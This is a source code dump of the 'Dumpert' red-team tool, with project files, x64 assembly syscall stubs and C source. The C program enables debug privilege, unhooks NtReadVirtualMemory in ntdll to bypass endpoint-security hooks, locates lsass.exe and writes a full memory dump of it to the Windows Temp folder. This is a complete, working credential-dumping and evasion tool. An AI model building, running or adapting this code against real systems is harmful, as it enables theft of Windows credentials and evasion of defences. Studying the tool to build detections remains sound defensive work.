false 36 | v140 37 | true 38 | MultiByte 39 | 40 | 41 | DynamicLibrary 42 | true 43 | v140 44 | MultiByte 45 | 46 | 47 | DynamicLibrary 48 | false 49 | v140 50 | true 51 | MultiByte 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | Disabled 77 | true 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | 86 | 87 | 88 | 89 | Level3 90 | MaxSpeed 91 | true 92 | true 93 | true 94 | 95 | 96 | true 97 | true 98 | 99 | 100 | 101 | 102 | Level3 103 | MaxSpeed 104 | true 105 | true 106 | true 107 | MultiThreaded 108 | 109 | 110 | true 111 | true 112 | false 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Windows\System32\Rundll32.exe 5 | C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll,Dump 6 | WindowsLocalDebugger 7 | 8 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 | syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Dumpert.c: -------------------------------------------------------------------------------- 1 | #undef _UNICODE 2 | #define _UNICODE 3 | #undef UNICODE 4 | #define UNICODE 5 | 6 | #include 7 | #include 8 | #include "Dumpert.h" 9 | #include 10 | 11 | #pragma comment (lib, "Dbghelp.lib") 12 | 13 | 14 | BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { 15 | BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF}; 16 | 17 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 18 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 19 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory10; 20 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory10; 21 | } 22 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { 23 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 24 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1; 25 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1; 26 | } 27 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 28 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 29 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory80; 30 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory80; 31 | } 32 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 33 | AssemblyBytes[4] = pWinVerInfo->SystemCall; 34 | ZwWriteVirtualMemory = &ZwWriteVirtualMemory81; 35 | ZwProtectVirtualMemory = &ZwProtectVirtualMemory81; 36 | } 37 | else { 38 | return FALSE; 39 | } 40 | 41 | LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); 42 | 43 | printf(" [+] %s function pointer at: 0x%p\n", pWinVerInfo->lpApiCall, lpProcAddress); 44 | printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]); 45 | printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall); 46 | 47 | LPVOID lpBaseAddress = lpProcAddress; 48 | ULONG OldProtection, NewProtection; 49 | SIZE_T uSize = 10; 50 | NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); 51 | if (status != STATUS_SUCCESS) { 52 | wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); 53 | return FALSE; 54 | } 55 | 56 | status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL); 57 | if (status != STATUS_SUCCESS) { 58 | wprintf(L" [!] ZwWriteVirtualMemory failed.\n"); 59 | return FALSE; 60 | } 61 | 62 | status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); 63 | if (status != STATUS_SUCCESS) { 64 | wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); 65 | return FALSE; 66 | } 67 | 68 | return TRUE; 69 | } 70 | 71 | BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) { 72 | pWinVerInfo->hTargetPID = NULL; 73 | 74 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 75 | ZwQuerySystemInformation = &ZwQuerySystemInformation10; 76 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory10; 77 | NtFreeVirtualMemory = &NtFreeVirtualMemory10; 78 | } 79 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) { 80 | ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1; 81 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1; 82 | NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1; 83 | } 84 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 85 | ZwQuerySystemInformation = &ZwQuerySystemInformation80; 86 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory80; 87 | NtFreeVirtualMemory = &NtFreeVirtualMemory80; 88 | } 89 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 90 | ZwQuerySystemInformation = &ZwQuerySystemInformation81; 91 | NtAllocateVirtualMemory = &NtAllocateVirtualMemory81; 92 | NtFreeVirtualMemory = &NtFreeVirtualMemory81; 93 | } 94 | else { 95 | return FALSE; 96 | } 97 | 98 | ULONG uReturnLength = 0; 99 | NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength); 100 | if (!status == 0xc0000004) { 101 | return FALSE; 102 | } 103 | 104 | LPVOID pBuffer = NULL; 105 | SIZE_T uSize = uReturnLength; 106 | status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE); 107 | if (status != 0) { 108 | return FALSE; 109 | } 110 | 111 | status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength); 112 | if (status != 0) { 113 | return FALSE; 114 | } 115 | 116 | _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString) 117 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString"); 118 | if (RtlEqualUnicodeString == NULL) { 119 | return FALSE; 120 | } 121 | 122 | PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer; 123 | do { 124 | if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) { 125 | pWinVerInfo->hTargetPID = pProcInfo->ProcessId; 126 | break; 127 | } 128 | pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta); 129 | 130 | } while (pProcInfo); 131 | 132 | status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE); 133 | 134 | if (pWinVerInfo->hTargetPID == NULL) { 135 | return FALSE; 136 | } 137 | 138 | return TRUE; 139 | } 140 | 141 | BOOL IsElevated() { 142 | BOOL fRet = FALSE; 143 | HANDLE hToken = NULL; 144 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 145 | TOKEN_ELEVATION Elevation = { 0 }; 146 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 147 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 148 | fRet = Elevation.TokenIsElevated; 149 | } 150 | } 151 | if (hToken) { 152 | CloseHandle(hToken); 153 | } 154 | return fRet; 155 | } 156 | 157 | BOOL SetDebugPrivilege() { 158 | HANDLE hToken = NULL; 159 | TOKEN_PRIVILEGES TokenPrivileges = { 0 }; 160 | 161 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) { 162 | return FALSE; 163 | } 164 | 165 | TokenPrivileges.PrivilegeCount = 1; 166 | TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0; 167 | 168 | LPWSTR lpwPriv = L"SeDebugPrivilege"; 169 | if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) { 170 | CloseHandle(hToken); 171 | return FALSE; 172 | } 173 | 174 | if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) { 175 | CloseHandle(hToken); 176 | return FALSE; 177 | } 178 | 179 | CloseHandle(hToken); 180 | return TRUE; 181 | } 182 | 183 | 184 | int wmain(int argc, wchar_t* argv[]) { 185 | wprintf(L" ________ __ _____.__ __ \n"); 186 | wprintf(L" \\_____ \\ __ ___/ |__/ ____\\ | _____ ____ | | __ \n"); 187 | wprintf(L" / | \\| | \\ __\\ __\\| | \\__ \\ / \\| |/ / \n"); 188 | wprintf(L" / | \\ | /| | | | | |__/ __ \\| | \\ < \n"); 189 | wprintf(L" \\_______ /____/ |__| |__| |____(____ /___| /__|_ \\ \n"); 190 | wprintf(L" \\/ \\/ \\/ \\/ \n"); 191 | wprintf(L" Dumpert \n"); 192 | wprintf(L" By Cneeliz @Outflank 2019 \n\n"); 193 | 194 | LPCWSTR lpwProcName = L"lsass.exe"; 195 | 196 | if (sizeof(LPVOID) != 8) { 197 | wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n"); 198 | exit(1); 199 | } 200 | 201 | if (!IsElevated()) { 202 | wprintf(L"[!] You need elevated privileges to run this tool!\n"); 203 | exit(1); 204 | } 205 | 206 | SetDebugPrivilege(); 207 | 208 | PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO)); 209 | 210 | // First set OS Version/Architecture specific values 211 | OSVERSIONINFOEXW osInfo; 212 | LPWSTR lpOSVersion; 213 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 214 | 215 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 216 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 217 | if (RtlGetVersion == NULL) { 218 | return FALSE; 219 | } 220 | 221 | wprintf(L"[1] Checking OS version details:\n"); 222 | RtlGetVersion(&osInfo); 223 | swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 224 | pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber; 225 | 226 | // Now create os/build specific syscall function pointers. 227 | if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) { 228 | lpOSVersion = L"10 or Server 2016"; 229 | wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); 230 | wprintf(L" [+] Mapping version specific System calls.\n"); 231 | ZwOpenProcess = &ZwOpenProcess10; 232 | NtCreateFile = &NtCreateFile10; 233 | ZwClose = &ZwClose10; 234 | pWinVerInfo->SystemCall = 0x3F; 235 | } 236 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) { 237 | lpOSVersion = L"7 SP1 or Server 2008 R2"; 238 | wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); 239 | wprintf(L" [+] Mapping version specific System calls.\n"); 240 | ZwOpenProcess = &ZwOpenProcess7SP1; 241 | NtCreateFile = &NtCreateFile7SP1; 242 | ZwClose = &ZwClose7SP1; 243 | pWinVerInfo->SystemCall = 0x3C; 244 | } 245 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) { 246 | lpOSVersion = L"8 or Server 2012"; 247 | wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); 248 | wprintf(L" [+] Mapping version specific System calls.\n"); 249 | ZwOpenProcess = &ZwOpenProcess80; 250 | NtCreateFile = &NtCreateFile80; 251 | ZwClose = &ZwClose80; 252 | pWinVerInfo->SystemCall = 0x3D; 253 | } 254 | else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) { 255 | lpOSVersion = L"8.1 or Server 2012 R2"; 256 | wprintf(L" [+] Operating System is Windows %ls, build number %d\n", lpOSVersion, pWinVerInfo->dwBuildNumber); 257 | wprintf(L" [+] Mapping version specific System calls.\n"); 258 | ZwOpenProcess = &ZwOpenProcess81; 259 | NtCreateFile = &NtCreateFile81; 260 | ZwClose = &ZwClose81; 261 | pWinVerInfo->SystemCall = 0x3E; 262 | } 263 | else { 264 | wprintf(L" [!] OS Version not supported.\n\n"); 265 | exit(1); 266 | } 267 | 268 | wprintf(L"[2] Checking Process details:\n"); 269 | 270 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString) 271 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString"); 272 | if (RtlInitUnicodeString == NULL) { 273 | return FALSE; 274 | } 275 | 276 | RtlInitUnicodeString(&pWinVerInfo->ProcName, lpwProcName); 277 | 278 | if (!GetPID(pWinVerInfo)) { 279 | wprintf(L" [!] Enumerating process failed.\n"); 280 | exit(1); 281 | } 282 | 283 | wprintf(L" [+] Process ID of %wZ is: %lld\n", pWinVerInfo->ProcName, (ULONG64)pWinVerInfo->hTargetPID); 284 | pWinVerInfo->lpApiCall = "NtReadVirtualMemory"; 285 | 286 | if (!Unhook_NativeAPI(pWinVerInfo)) { 287 | printf(" [!] Unhooking %s failed.\n", pWinVerInfo->lpApiCall); 288 | exit(1); 289 | } 290 | 291 | wprintf(L"[3] Create memorydump file:\n"); 292 | 293 | wprintf(L" [+] Open a process handle.\n"); 294 | HANDLE hProcess = NULL; 295 | OBJECT_ATTRIBUTES ObjectAttributes; 296 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 297 | CLIENT_ID uPid = { 0 }; 298 | 299 | uPid.UniqueProcess = pWinVerInfo->hTargetPID; 300 | uPid.UniqueThread = (HANDLE)0; 301 | 302 | NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid); 303 | if (hProcess == NULL) { 304 | wprintf(L" [!] Failed to get processhandle.\n"); 305 | exit(1); 306 | } 307 | 308 | WCHAR chDmpFile[MAX_PATH] = L"\\??\\"; 309 | WCHAR chWinPath[MAX_PATH]; 310 | GetWindowsDirectory(chWinPath, MAX_PATH); 311 | wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath); 312 | wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp"); 313 | 314 | UNICODE_STRING uFileName; 315 | RtlInitUnicodeString(&uFileName, chDmpFile); 316 | 317 | wprintf(L" [+] Dump %wZ memory to: %wZ\n", pWinVerInfo->ProcName, uFileName); 318 | 319 | HANDLE hDmpFile = NULL; 320 | IO_STATUS_BLOCK IoStatusBlock; 321 | ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock)); 322 | OBJECT_ATTRIBUTES FileObjectAttributes; 323 | InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL); 324 | 325 | // Open input file for writing, overwrite existing file. 326 | status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0, 327 | FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 328 | 329 | if (hDmpFile == INVALID_HANDLE_VALUE) { 330 | wprintf(L" [!] Failed to create dumpfile.\n"); 331 | ZwClose(hProcess); 332 | exit(1); 333 | } 334 | 335 | DWORD dwTargetPID = GetProcessId(hProcess); 336 | BOOL Success = MiniDumpWriteDump(hProcess, 337 | dwTargetPID, 338 | hDmpFile, 339 | MiniDumpWithFullMemory, 340 | NULL, 341 | NULL, 342 | NULL); 343 | if ((!Success)) 344 | { 345 | wprintf(L" [!] Failed to create minidump, error code: %x\n", GetLastError()); 346 | } 347 | else { 348 | wprintf(L" [+] Dump succesful.\n"); 349 | } 350 | 351 | ZwClose(hDmpFile); 352 | ZwClose(hProcess); 353 | 354 | return 0; 355 | } -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Dumpert.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define STATUS_SUCCESS 0 6 | #define OBJ_CASE_INSENSITIVE 0x00000040L 7 | #define FILE_OVERWRITE_IF 0x00000005 8 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 9 | typedef LONG KPRIORITY; 10 | 11 | #define InitializeObjectAttributes( i, o, a, r, s ) { \ 12 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 13 | (i)->RootDirectory = r; \ 14 | (i)->Attributes = a; \ 15 | (i)->ObjectName = o; \ 16 | (i)->SecurityDescriptor = s; \ 17 | (i)->SecurityQualityOfService = NULL; \ 18 | } 19 | 20 | typedef struct _UNICODE_STRING { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | PWSTR Buffer; 24 | } UNICODE_STRING, *PUNICODE_STRING; 25 | 26 | typedef const UNICODE_STRING* PCUNICODE_STRING; 27 | 28 | typedef struct _WIN_VER_INFO { 29 | WCHAR chOSMajorMinor[8]; 30 | DWORD dwBuildNumber; 31 | UNICODE_STRING ProcName; 32 | HANDLE hTargetPID; 33 | LPCSTR lpApiCall; 34 | INT SystemCall; 35 | } WIN_VER_INFO, *PWIN_VER_INFO; 36 | 37 | typedef struct _OBJECT_ATTRIBUTES { 38 | ULONG Length; 39 | HANDLE RootDirectory; 40 | PUNICODE_STRING ObjectName; 41 | ULONG Attributes; 42 | PVOID SecurityDescriptor; 43 | PVOID SecurityQualityOfService; 44 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 45 | 46 | typedef struct _CLIENT_ID { 47 | HANDLE UniqueProcess; 48 | HANDLE UniqueThread; 49 | } CLIENT_ID, *PCLIENT_ID; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation, 53 | SystemProcessorInformation, 54 | SystemPerformanceInformation, 55 | SystemTimeOfDayInformation, 56 | SystemPathInformation, 57 | SystemProcessInformation, 58 | SystemCallCountInformation, 59 | SystemDeviceInformation, 60 | SystemProcessorPerformanceInformation, 61 | SystemFlagsInformation, 62 | SystemCallTimeInformation, 63 | SystemModuleInformation 64 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 65 | 66 | typedef struct _SYSTEM_PROCESSES { 67 | ULONG NextEntryDelta; 68 | ULONG ThreadCount; 69 | ULONG Reserved1[6]; 70 | LARGE_INTEGER CreateTime; 71 | LARGE_INTEGER UserTime; 72 | LARGE_INTEGER KernelTime; 73 | UNICODE_STRING ProcessName; 74 | KPRIORITY BasePriority; 75 | HANDLE ProcessId; 76 | HANDLE InheritedFromProcessId; 77 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 78 | 79 | typedef struct _IO_STATUS_BLOCK 80 | { 81 | union 82 | { 83 | LONG Status; 84 | PVOID Pointer; 85 | }; 86 | ULONG Information; 87 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 88 | 89 | 90 | // Windows 7 SP1 / Server 2008 R2 specific Syscalls 91 | EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 92 | EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 93 | EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 94 | EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle); 95 | EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 96 | EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 97 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 98 